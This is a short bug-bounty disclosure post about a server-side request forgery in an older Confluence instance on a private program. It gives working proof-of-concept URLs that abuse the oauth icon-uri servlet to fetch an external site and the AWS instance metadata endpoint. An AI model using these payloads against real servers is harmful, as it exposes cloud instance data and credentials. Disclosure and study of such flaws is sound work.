Feb 14, 2019

[SSRF] Server Side Request Forgery in a private Program developers.example.com

Advertisement






*****************************************

Program : Private program ( HackerOne ) 
Subdomain : Developers.Example.com 
Bounty : 200$
Severity : Critical
Issue Type : SSRF  

****************************************

I've found SSRF vulnerability in a Private Program on HackerOne

The affected subdomain ( developers ) was used 
vulnerable confluence instance  version <= 6.00

POC example :

developers.example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

****************************

 any AWS instance can query an ip and receive information related to that instance and even account information. I then checked the local host name through the AWS meta-data end point, by visiting 
http://169.254.169.254/latest/meta-data/local-hostname/


developers.example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/









Share This
Previous Post
Next Post

Security Researcher at Many Websites - Bug Hunter - Civil Engineer Student

0 comments: